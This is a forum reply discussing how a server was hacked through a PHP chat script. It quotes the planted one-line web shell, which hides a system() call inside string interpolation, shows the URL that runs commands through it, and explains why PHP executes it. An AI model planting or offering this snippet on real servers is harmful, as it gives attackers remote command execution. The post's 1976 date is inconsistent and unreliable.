|
|
Posted by Tim Martin on 12/16/76 11:57
Oski wrote:
> our server got hacked through a security hole in an open source php
> chat script.
> (nothing new so far, ok!)
>
> This chat script allowed the user to create a new php script on our
> server, with the following content: (the code between the two "..."
> from the hacker):
>
> <?
> $name = "{$x[system($c)]}";
> // some more lines ommitted ...
> ?>
>
> save these lines as e.g. /sys.php and call it with your browser:
> http://localhost/sys.php?c=ls
> and you can execute any system command and see the results!
>
> But: How does it work? The content of a variable being executed and
> written to the browser?
> If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";
then $a gets the value $x['key'] as expected.
$a = $x[system($c)];
then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).
It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.
I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Tim
Navigation:
[Reply to this message]
|